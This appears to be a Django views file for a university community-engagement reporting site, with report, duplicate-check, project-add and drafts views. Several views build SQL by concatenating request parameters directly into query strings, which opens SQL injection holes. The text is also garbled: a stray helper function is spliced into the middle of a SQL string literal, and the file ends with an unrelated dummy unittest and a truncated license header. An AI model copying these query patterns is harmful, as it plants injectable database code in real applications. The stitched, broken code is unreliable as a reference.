render(request, 'reports/projects_private_view.html', {'project': projects_list, 'data_definition':data_definition, "missions": missions, "communityPartners": communityPartners, 'campus_filter': campus_filter, 'college_filter': campusPartners, 'campus_id': campus_id, 'k12_choices': k12_choices, 'k12_selection': k12_selection, 'cec_part_choices': cec_part_choices, 'cec_part_selection': cec_part_selection,'projects': project_filter, 'cards':cards, 'parameters':parameters}) @login_required() def projectstablePrivateReport(request): selectedprojectId = request.GET.get('proj_id_list', None) print('selectedprojectId--',selectedprojectId) data_definition=DataDefinition.objects.all() missions = ProjectMissionFilter(request.GET, queryset=ProjectMission.objects.filter(mission_type='Primary')) status_draft = Status.objects.filter(name='Drafts') project_filter = ProjectFilter(request.GET, queryset=Project.objects.all().exclude(status__in=status_draft)) communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) campusPartners = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) # campus_filtered_ids = campusPartners.qs.values_list('id', flat=True) # campus_filtered_ids = [campus.id for campus in campusPartners.qs] # campus_project_filter = ProjectCampusFilter(request.GET, queryset=ProjectCampusPartner.objects.filter( # campus_partner_id__in=campus_filtered_ids)) projects_list=[] cursor = connection.cursor() k12_selection = request.GET.get('k12_flag', None) # k12_init_selection = "All" # if k12_selection is None: # k12_selection = k12_init_selection k12_choices = K12ChoiceForm(initial={'k12_choice': k12_selection}) engagement_type_filter = request.GET.get('engagement_type', None) if engagement_type_filter is None or engagement_type_filter == "All" or engagement_type_filter == '': eng_type_cond = '%' else: eng_type_cond = engagement_type_filter mission_type_filter = request.GET.get('mission', None) if mission_type_filter is None or mission_type_filter == "All" or mission_type_filter == '': mission_type_cond = '%' else: mission_type_cond = mission_type_filter community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter campus_partner_filter = request.GET.get('campus_partner', None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = 0 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) college_unit_filter = request.GET.get('college_name', None) if college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs = CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_cond) campus_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year - 1) + "-" + str(year)[-2:] else: a_year = str(year - 2) + "-" + str(year - 1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: 
default_yr_id = max(yrs) max_yr_id = max(yrs) if academic_year_filter is None or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) K12_filter = request.GET.get('k12_flag', None) if K12_filter is None or K12_filter == "All" or K12_filter == '': K12_filter_cond = '%' elif K12_filter == 'Yes': K12_filter_cond = 't' elif K12_filter == 'No': K12_filter_cond = 'f' cec_part_init_selection = "All" cec_part_selection = request.GET.get('weitz_cec_part', None) if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_comm_part_cond = '%' cec_camp_part_cond = '%' elif cec_part_selection == "CURR_COMM": cec_comm_part_cond = 'Current' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_COMM": cec_comm_part_cond = 'Former' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Former' elif cec_part_selection == "CURR_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Current' params = [eng_type_cond, mission_type_cond, community_type_cond, campus_partner_cond, college_unit_cond, K12_filter_cond, academic_start_year_cond, academic_end_year_cond, cec_comm_part_cond, cec_camp_part_cond] cursor = connection.cursor() project_start_query = "select distinct p.project_name \ , array_agg(distinct hm.mission_name) mission_area \ , array_agg(distinct pc.name) CommPartners \ , array_agg(distinct c.name) CampPartners \ , array_agg(distinct e.name) engagement_type \ , pa.academic_year \ , p.semester \ , status.name status \ , case when p.start_date is null then 'None' end start_date \ , case when p.end_date is null then 'None' end end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name activity_type \ , p.description \ , p.project_type project_type \ , p.end_semester end_semester \ , ea.academic_year end_academic_year \ , array_agg(distinct s.sub_category) sub_category \ , p.campus_lead_staff campus_lead_staff \ , hm.mission_image_url mission_image \ , p.other_activity_type act_type \ , p.other_sub_category other_subCat \ , array_agg(s.sub_category_tags) sub_tags \ from projects_project p \ join projects_projectmission m on p.id = m.project_name_id and lower(m.mission_type) = 'primary' \ left join home_missionarea hm on hm.id = m.mission_id \ left join projects_engagementtype e on e.id = p.engagement_type_id \ left join projects_projectcommunitypartner pp on p.id = pp.project_name_id \ left join partners_communitypartner pc on pp.community_partner_id = pc.id \ left join projects_projectcampuspartner pp2 on p.id = pp2.project_name_id \ left join partners_campuspartner c on pp2.campus_partner_id = c.id \ left join projects_academicyear pa on p.academic_year_id = pa.id \ left join projects_academicyear ea on p.end_academic_year_id = ea.id \ left join projects_activitytype a on p.activity_type_id = a.id \ left join projects_projectsubcategory psub on psub.project_name_id = p.id \ left join projects_subcategory s on psub.sub_category_id = s.id \ left join projects_status status on status.id = p.status_id \ where status.name != 'Drafts' \ and ((p.academic_year_id <= 
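# Hedged sketch: the five report views repeat the same normalisation for every GET filter, where
# a missing, empty, or "All" value means "no restriction" and is encoded as the SQL wildcard '%'.
# A tiny helper (illustrative name `filter_cond`) captures that convention.
def filter_cond(request, param, wildcard='%'):
    value = request.GET.get(param, None)
    if value is None or value == '' or value == 'All':
        return wildcard
    return value

# e.g. eng_type_cond = filter_cond(request, 'engagement_type')
#      mission_type_cond = filter_cond(request, 'mission')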
" + str(academic_start_year_cond) + ") AND \ (COALESCE(p.end_academic_year_id, p.academic_year_id) >= " + str(academic_end_year_cond) + ")) " clause_query = " " if eng_type_cond !='%': clause_query +=" and e.id::text like '"+ eng_type_cond +"'" if mission_type_cond !='%': clause_query += " and m.mission_id::text like '"+ mission_type_cond + "'" if campus_partner_cond !='%': clause_query += " and pp2.campus_partner_id::text like '" + campus_partner_cond +"'" if college_unit_cond != '%': clause_query +=" and c.college_name_id::text like '" + college_unit_cond +"' " if K12_filter_cond !='%': clause_query +=" and p.k12_flag = '" + K12_filter_cond + "'" if community_type_cond != '%': clause_query += " and pc.community_type_id::text like '" + community_type_cond + "'" if cec_camp_part_cond != '%': clause_query += " and c.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '" + cec_camp_part_cond + "')" if cec_comm_part_cond != '%': clause_query += " and pc.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '" + cec_comm_part_cond + "')" project_end_query = project_start_query + clause_query +" group by p.project_name \ , pa.academic_year \ , p.semester \ , status.name \ , p.start_date \ , p.end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name \ , p.description \ , project_type \ , end_semester \ , end_academic_year \ , campus_lead_staff \ , mission_image \ , act_type \ , other_subCat \ order by pa.academic_year desc; " cursor.execute(project_end_query) cec_part_choices = CecPartChoiceForm(initial={'cec_choice': cec_part_selection}) print("CEC partner condition: ", cec_part_selection) if selectedprojectId is not None: if selectedprojectId.find(",") != -1: project_name_list = selectedprojectId.split(",") print('project_name_list: ', str(tuple(project_name_list))) cursor.execute(sqlfiles.showSelectedProjects(tuple(project_name_list)), params=None) # cursor.execute(sql.search_projects_sql,str(tuple(project_name_list))) else: projId = "(" + str(selectedprojectId) + ")" print('project_name_list--', projId) cursor.execute(sqlfiles.showSelectedProjects(projId), params=None) for obj in cursor.fetchall(): proj_names = obj[0] name = '' Projectname = proj_names.split(':') if len(Projectname) >= 2 and Projectname[1]: for i in range(0, len(Projectname) - 1): name += Projectname[i] else: for i in Projectname: name = name + str(i) print ("Project name is-----", name) projects_list.append({"name": name, "projmisn": obj[1],"comm_part": obj[2], "camp_part": obj[3],"engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7],"startDate": obj[8], "endDate": obj[9],"outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13],"total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[19] , "end_semester": obj[20], "end_academic_year" : obj[21], "sub_category" : obj[22], "campus_lead_staff": obj[23], "mission_image": obj[24], "other_activity_type": obj[25], "other_sub_category": obj[26], "sub_tags": obj[27] }) page = request.GET.get('page', 1) get_copy = request.GET.copy() parameters = get_copy.pop('page', True) and get_copy.urlencode() cursor.close() return render(request, 'reports/projectsprivatetableview.html', {'project': projects_list, 
'data_definition':data_definition, "missions": missions, "communityPartners": communityPartners, 'campus_filter': campus_filter, 'college_filter': campusPartners, 'campus_id': campus_id, 'k12_choices': k12_choices, 'k12_selection': k12_selection, 'cec_part_choices': cec_part_choices, 'cec_part_selection': cec_part_selection,'projects': project_filter,'parameters':parameters}) #Project private reports card and table view end here. def communityPublicReport(request): community_dict = {} community_list = [] data_list=[] legislative_choices = [] legislative_search = '' data_definition=DataDefinition.objects.all() communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) project_filter = ProjectFilter(request.GET, queryset=Project.objects.all()) status_draft = Status.objects.filter(name='Drafts') comm_ids = request.GET.get('comm_ids', None) legislative_selection = request.GET.get('legislative_value', None) if legislative_selection is None: legislative_selection = 'All' for i in range(1,50): legistalive_val = 'Legislative District '+str(i) legislative_choices.append(legistalive_val) if legislative_selection is not None and legislative_selection != 'All': if legislative_selection == '-1': legislative_search ='%' else: legislative_search = legislative_selection.split(" ")[2] college_partner_filter = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) college_value = request.GET.get('college_name', None) if college_value is None or college_value == "All" or college_value == '': campus_filter_qs = CampusPartner.objects.all() else: campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_value) campus_project_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] college_unit_filter = request.GET.get('college_name', None) if college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs = CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_filter) campus_project_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] if legislative_selection is None or legislative_selection == "All" or legislative_selection == '': legislative_district_cond = '%' else: legislative_district_cond = legislative_search community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs =[] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year-1) + "-" + str(year )[-2:] else: a_year = str(year - 2) + "-" + str(year-1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academic_year_filter is None or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) campus_partner_filter = request.GET.get('campus_partner', 
None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = -1 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) #cec_part_selection = request.GET.get('weitz_cec_part', None) # cec_part_init_selection = "All" cec_part_selection = request.GET.get('weitz_cec_part', None) # cec_part_init_selection = "All" if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_part_cond = '%' # cursor.execute(sql.projects_report, [project_ids]) elif cec_part_selection == "CURR_COMM": cec_part_cond = 'Current' elif cec_part_selection == "FORMER_COMM": cec_part_cond = 'Former' if comm_ids is not None: params = [] if comm_ids.find(",") != -1: comm_list = comm_ids.split(",") params.append(tuple(comm_list)) cursor = connection.cursor() cursor.execute(sql.selected_community_public_report, params) else: params.append(str(comm_ids)) cursor = connection.cursor() cursor.execute(sql.selected_One_community_public_report, params) else: params = [community_type_cond, academic_start_year_cond, academic_end_year_cond, campus_partner_cond, legislative_district_cond, college_unit_cond, cec_part_cond] cursor = connection.cursor() cursor.execute(sql.community_public_report, params) cec_part_choices = OommCecPartChoiceForm(initial={'cec_choice': cec_part_selection}) for obj in cursor.fetchall(): proj_ids = obj[6] proj_idList = '' if proj_ids is not None: name_count = 0 if len(proj_ids) > 0: for i in proj_ids: proj_idList = proj_idList + str(i) if name_count < len(proj_ids) - 1: proj_idList = proj_idList + str(",") name_count = name_count + 1 data_list.append({"community_name": obj[0], "community_mission":obj[1],"project_count": obj[2], "project_id_list": proj_idList, "website": obj[3], "CommStatus": obj[4]}) cursor.close() return render(request, 'reports/community_public_view.html', { 'college_filter': college_partner_filter, 'campus_filter': campus_project_filter, 'project_filter': project_filter, 'legislative_choices':legislative_choices, 'legislative_value':legislative_selection, 'communityPartners': communityPartners, 'community_list': community_list, 'communityData': data_list, 'data_definition':data_definition, 'campus_id':campus_id, 'cec_part_choices': cec_part_choices}) @login_required() def communityPrivateReport(request): community_dict = {} data_list = [] community_list = [] legislative_choices = [] legislative_search = '' # comp_part_contact = [] data_definition=DataDefinition.objects.all() project_filter = ProjectFilter(request.GET, queryset=Project.objects.all()) communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) #set legislative_selection on template choices field -- Manu Start legislative_selection = request.GET.get('legislative_value', None) if legislative_selection is None: legislative_selection = 'All' # legislative_choices.append('All') for i in range(1,50): legistalive_val = 'Legislative District '+str(i) legislative_choices.append(legistalive_val) if legislative_selection is not None and legislative_selection != 'All': if legislative_selection == '-1': legislative_search ='%' else: legislative_search = legislative_selection.split(" ")[2] college_partner_filter = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) project_filtered_ids = project_filter.qs.values_list('id', flat=True) college_unit_filter = request.GET.get('college_name', None) if 
college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs = CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_filter) campus_project_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] if legislative_selection is None or legislative_selection == "All" or legislative_selection == '': legislative_district_cond = '%' else: legislative_district_cond = legislative_search community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year-1) + "-" + str(year )[-2:] else: a_year = str(year - 2) + "-" + str(year-1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academic_year_filter is None or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) campus_partner_filter = request.GET.get('campus_partner', None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = 0 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) cec_part_selection = request.GET.get('weitz_cec_part', None) # cec_part_init_selection = "All" if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_part_cond = '%' # cursor.execute(sql.projects_report, [project_ids]) elif cec_part_selection == "CURR_COMM": cec_part_cond = 'Current' elif cec_part_selection == "FORMER_COMM": cec_part_cond = 'Former' params = [community_type_cond, academic_start_year_cond, academic_end_year_cond, campus_partner_cond, legislative_district_cond, college_unit_cond, cec_part_cond] cursor = connection.cursor() cursor.execute(sql.community_private_report, params) cec_part_choices = OommCecPartChoiceForm(initial={'cec_choice': cec_part_selection}) for obj in cursor.fetchall(): proj_ids = obj[4] proj_idList = '' sum_uno_students = 0 sum_uno_hours = 0 if proj_ids is not None: name_count = 0 if len(proj_ids) > 0: for i in proj_ids: cursor.execute("Select p.total_uno_students , p.total_uno_hours from projects_project p where p.id=" + str(i)) for obj1 in cursor.fetchall(): sum_uno_students = sum_uno_students + obj1[0] sum_uno_hours = sum_uno_hours + obj1[1] proj_idList = proj_idList + str(i) if name_count < len(proj_ids) - 1: proj_idList = proj_idList + str(",") name_count = name_count + 1 data_list.append({"CommunityName": obj[0], "mission":obj[1],"Projects": obj[2], "numberofunostudents": sum_uno_students, "unostudentshours": sum_uno_hours, "website": obj[3], "proj_id_list": proj_idList, "CommStatus": obj[5]}) cursor.close() return render(request, 
'reports/community_private_view.html', {'college_filter': college_partner_filter,'project_filter': project_filter,'data_definition':data_definition, 'legislative_choices':legislative_choices, 'legislative_value':legislative_selection, 'communityPartners': communityPartners, 'community_list': community_list, 'communityData': data_list, 'campus_filter': campus_project_filter, 'campus_id':campus_id, 'cec_part_choices': cec_part_choices}) # project duplication check def checkProject(request): data_list = [] flag = 0 data_definition = DataDefinition.objects.all() academic_yr_filter = AcademicYear.objects.all().order_by('-academic_year') campus_filter = CampusPartner.objects.all() Community_filter = CommunityPartner.objects.all() if request.method == 'POST': flag = 0 projectName = request.POST['projectName'].strip() communityPartner = request.POST['communityPartner'] if communityPartner == 'All': communityPartner_id = -1 else: communityPartner_id = 0 campusPartner = request.POST['campusPartner'] if campusPartner == 'All': campusPartner_id = -1 else: campusPartner_id = 0 academicYear = request.POST['academicYear'] acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year - 1) + "-" + str(year)[-2:] else: a_year = str(year - 2) + "-" + str(year - 1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academicYear is None or academicYear == '': academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 # academic_start_year_cond = int(default_yr_id) # academic_end_year_cond = int(default_yr_id) acad_id = 0 elif academicYear == "All" : academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 acad_id = -1 else: academic_year_filter = AcademicYear.objects.get(academic_year=academicYear).id academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) acad_id = 0 commpart_filter = communityPartner.replace('All', '') camp_filter = campusPartner.replace('All', '') acad_filter = academicYear.replace('All', '') # academic_filter_qs = AcademicYear.objects.get(academic_year=academicYear) # acad = academic_filter_qs.id # acad_id = str(acad) # # acad_id = [m.id for m in academic_filter_qs] # print(acad_id) cursor = connection.cursor() cursor.execute(sqlfiles.checkProjectsql(projectName, commpart_filter, camp_filter, academic_start_year_cond,academic_end_year_cond ), params=None) rows = cursor.fetchall() # print(rows[0][0]) if (rows != []): for obj in rows: proj_names = obj[0] name = '' try: Projectname = proj_names.split(':') except ValueError: name = Projectname else: for i in range(0, len(Projectname) - 1): name += Projectname[i] proj_ids = obj[4] proj_idList = '' if proj_ids is not None: name_count = 0 if len(proj_ids) > 0: for i in proj_ids: proj_idList = proj_idList + str(i) if name_count < len(proj_ids) - 1: proj_idList = proj_idList + str(",") name_count = name_count + 1 comm_part = obj[1] comm_partList = '' if comm_part is not None: name_count = 0 if len(comm_part) > 0: for i in comm_part: comm_partList = comm_partList + str(i) if name_count < len(comm_part) - 1: comm_partList = comm_partList + str(",") name_count = name_count + 1 camp_part = obj[3] camp_partList = '' if camp_part is not None: name_count = 0 if len(camp_part) > 0: for i in camp_part: camp_partList = camp_partList 
+ str(i) if name_count < len(camp_part) - 1: camp_partList = camp_partList + str(",") name_count = name_count + 1 if (projectName.strip().lower() in obj[0].split("(")[0].strip().lower()): flag = 2 if (projectName.strip().lower() == obj[0].split("(")[0].strip().lower()): flag = 1 data_list.append( {"projectName": name, "communityPartner": comm_partList, "campusPartner": camp_partList, "academicYear": obj[2], "project_ids": proj_idList, 'flagBit': flag}) return render(request, 'projects/checkProject.html', {'data_list': data_list, "projectName": projectName, 'flagBit': flag, 'data_definition': data_definition, 'academic_yr_filter': academic_yr_filter, 'campus_filter': campus_filter, 'communityPartner_id': communityPartner_id, "Community_filter": Community_filter, 'communityPartner_selected': communityPartner, 'campusPartner_selected': campusPartner, 'campusPartner_id': campusPartner_id, 'academicYear_selected': academicYear, 'acad_id': acad_id }) else: data_list.append({"projectName": "", "communityPartner": "", "campusPartner": "", "academicYear": "", "project_ids": "", 'flagBit': flag}) return render(request, 'projects/checkProject.html', {'data_list': data_list, "projectName": projectName, 'flagBit': flag, 'data_definition': data_definition, 'academic_yr_filter': academic_yr_filter, 'campus_filter': campus_filter, "Community_filter": Community_filter, 'communityPartner_selected': communityPartner, 'campusPartner_selected': campusPartner, 'academicYear_selected': academicYear }) else: return render(request, 'projects/checkProject.html', {'data_list': data_list, 'data_definition': data_definition, 'academic_yr_filter': academic_yr_filter, 'campus_filter': campus_filter, "Community_filter": Community_filter}) @login_required() # @campuspartner_required() def project_total_Add(request): mission_details = modelformset_factory(ProjectMission, form=ProjectMissionFormset) secondary_mission_details = modelformset_factory(ProjectMission, extra=1, form=ScndProjectMissionFormset) sub_category = modelformset_factory(ProjectSubCategory, extra=1, form=AddSubCategoryForm) proj_comm_part = modelformset_factory(ProjectCommunityPartner, extra=1, form=AddProjectCommunityPartnerForm) proj_campus_part = modelformset_factory(ProjectCampusPartner, extra=1, form=AddProjectCampusPartnerForm) data_definition=DataDefinition.objects.all() if request.method == 'POST': # cache.clear() project = ProjectFormAdd(request.POST) course = CourseForm(request.POST) formset = mission_details(request.POST or None, prefix='mission') categoryformset = sub_category(request.POST or None, prefix='sub_category') formset4 = secondary_mission_details(request.POST or None, prefix='secondary_mission') formset2 = proj_comm_part(request.POST or None, prefix='community') formset3 = proj_campus_part(request.POST or None, prefix='campus') # print("validation ststus:",project.is_valid() , formset.is_valid() ,course.is_valid() , formset2.is_valid()) if project.is_valid() and formset.is_valid() and course.is_valid() and formset2.is_valid() and formset3.is_valid() and formset4.is_valid() and categoryformset.is_valid(): ##Convert address to cordinates and save the legislatve district and household income a = 0 project.total_uno_hours = a proj = project.save() proj.project_name = proj.project_name + " :" + str(proj.academic_year) eng = str(proj.engagement_type) if eng == "Service Learning": course = course.save(commit=False) course.project_name = proj course.save() address = proj.address_line1 address = proj.address_line1 # if (address != "N/A"): # 
check if a community partner's address is there # fulladdress = proj.address_line1 + ' ' + proj.city # geocode_result = gmaps.geocode(fulladdress) # get the coordinates # proj.latitude = geocode_result[0]['geometry']['location']['lat'] # proj.longitude = geocode_result[0]['geometry']['location']['lng'] # #### checking lat and long are incorrect # if (proj.latitude == '0') or (proj.longitude == '0'): # project = ProjectFormAdd() # course = CourseForm() # formset = mission_details(queryset=ProjectMission.objects.none()) # formset4 = secondary_mission_details(queryset=ProjectMission.objects.none()) # # formset2 = proj_comm_part(queryset=ProjectCommunityPartner.objects.none()) # formset3 = proj_campus_part(queryset=ProjectCampusPartner.objects.none()) # return render(request, 'projects/createProject.html', # {'project': project, 'formset': formset, 'formset4': formset4, 'formset3': formset3, # 'course': course}) # proj.save() # coord = Point([proj.longitude, proj.latitude]) # for i in range(len(district)): # iterate through a list of district polygons # property = district[i] # polygon = shape(property['geometry']) # get the polygons # if polygon.contains(coord): # check if a partner is in a polygon # proj.legislative_district = property["id"] # assign the district number to a partner # proj.save() # for m in range(len(countyData)): # iterate through the County Geojson # properties2 = countyData[m] # polygon = shape(properties2['geometry']) # get the polygon # if polygon.contains(coord): # check if the partner in question belongs to a polygon # proj.county = properties2['properties']['NAME'] # proj.median_household_income = properties2['properties']['Income'] # proj.save() mission_form = formset.save(commit=False) secondary_mission_form = formset4.save(commit=False) proj_comm_form = formset2.save(commit=False) sub_cat_form = categoryformset.save(commit=False) proj_campus_form = formset3.save(commit=False) for k in proj_comm_form: k.project_name = proj k.save() for cat in sub_cat_form: cat.project_name = proj cat.save() for form in mission_form: form.project_name = proj #print("in add mission") form.mission_type = 'Primary' form.save() for form4 in secondary_mission_form: form4.project_name = proj #print("in add secondary mission") form4.mission_type = 'Other' form4.save() # projh = Project.objects.get(pk=project_name_id.pk) init = 0 t = 0 for c in proj_campus_form: c.project_name = proj c.save() # init = proj.total_uno_hours t += c.total_hours * c.total_people proj.total_uno_hours = t proj.save() projects_list = [] camp_part_names = [] p = 0 # Get the campus partner id related to the user camp_part_user = CampusPartnerUser.objects.filter(user_id=request.user.id) for c in camp_part_user: p = c.campus_partner_id # get all the project names base on the campus partner id proj_camp = list(ProjectCampusPartner.objects.filter(campus_partner_id=p)) for f in proj_camp: k = list(Project.objects.filter(id=f.project_name_id)) for x in k: projmisn = list(ProjectMission.objects.filter(project_name_id=x.id)) sub = list(ProjectSubCategory.objects.filter(project_name_id=x.id)) cp = list(ProjectCommunityPartner.objects.filter(project_name_id=x.id)) proj_camp_par = list(ProjectCampusPartner.objects.filter(project_name_id=x.id)) for proj_camp_par in proj_camp_par: camp_part = CampusPartner.objects.get(id=proj_camp_par.campus_partner_id) camp_part_names.append(camp_part) list_camp_part_names = camp_part_names camp_part_names = [] data = {'pk': x.pk, 'name': x.project_name, 'engagementType': x.engagement_type, 
'activityType': x.activity_type, 'academic_year': x.academic_year, 'facilitator': x.facilitator, 'semester': x.semester, 'status': x.status, 'description': x.description, 'startDate': x.start_date, 'endDate': x.end_date, 'total_uno_students': x.total_uno_students, 'total_uno_hours': x.total_uno_hours, 'total_k12_students': x.total_k12_students, 'total_k12_hours': x.total_k12_hours, 'total_uno_faculty': x.total_uno_faculty, 'total_other_community_members': x.total_other_community_members, 'outcomes': x.outcomes, 'total_economic_impact': x.total_economic_impact, 'projmisn': projmisn, 'cp': cp, 'sub':sub, 'camp_part': list_camp_part_names } projects_list.append(data) return render(request, 'projects/projectadd_done.html', {'project': projects_list}) else: project = ProjectFormAdd() course = CourseForm() formset = mission_details(queryset=ProjectMission.objects.none(), prefix='mission') formset4 = secondary_mission_details(queryset=ProjectMission.objects.none(), prefix='secondary_mission') formset2 = proj_comm_part(queryset=ProjectCommunityPartner.objects.none(), prefix='community') formset3 = proj_campus_part(queryset=ProjectCampusPartner.objects.none(), prefix='campus') return render(request, 'projects/projectadd.html', {'project': project, 'formset': formset, 'formset3': formset3, 'course': course,'data_definition':data_definition, 'formset2': formset2, 'formset4': formset4}) ###my drafts @login_required() def myDrafts(request): projects_list=[] data_definition=DataDefinition.objects.all() created_by_user= request.user.email created_by= home.models.User.objects.filter(email=created_by_user) project_created = Project.objects.filter(created_by__in= created_by) project_created_by = [p.id for p in project_created] project_updated = Project.objects.filter(updated_by__in=created_by) project_updated_by = [p.id for p in project_updated] camp_part_user = CampusPartnerUser.objects.filter(user_id = request.user.id) camp_part_id = camp_part_user.values_list('campus_partner_id', flat=True) proj_camp = ProjectCampusPartner.objects.filter(campus_partner__in=camp_part_id) project_ids = [project.project_name_id for project in proj_camp] ids = list(set(project_ids).union(project_created_by).union(project_updated_by)) if request.user.is_superuser == True: ids = [project.id for project in Project.objects.all()] cursor = connection.cursor() cursor.execute(sql.my_drafts, [ids]) for obj in cursor.fetchall(): projects_list.append( {"name": obj[0].split("(")[0], "projmisn": obj[1], "comm_part": obj[2], "camp_part": obj[3], "engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7], "startDate": obj[8], "endDate": obj[9], "outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13], "total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[20], "pk":obj[19] , "end_semester": obj[21], "end_academic_year": obj[22], "sub_category": obj[23], "campus_lead_staff": obj[24], "mission_image": obj[25], "other_activity_type": obj[26], "other_sub_category":obj[27]}) return render(request, 'projects/myDrafts.html', {'project': projects_list, 'data_definition':data_definition}) @login_required() def drafts_delete(request,pk): draft_delete = get_object_or_404(Project, pk=pk) draft_delete.delete() return HttpResponseRedirect("/myDrafts") def draft_project_done(request): return render(request, 'projects/draftadd_done.html') def 
submit_project_done(request):
    return render(request, 'projects/confirmAddProject.html')


def adminsubmit_project_done(request):
    return render(request, 'projects/adminconfirm.html')


# -*- coding: utf-8 -*-
from unittest import TestCase


class TestTwitter(TestCase):
    def test_test(self):
        self.assertEqual(True, True)


# pylint: disable=g-bad-file-header
# Copyright 2021 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
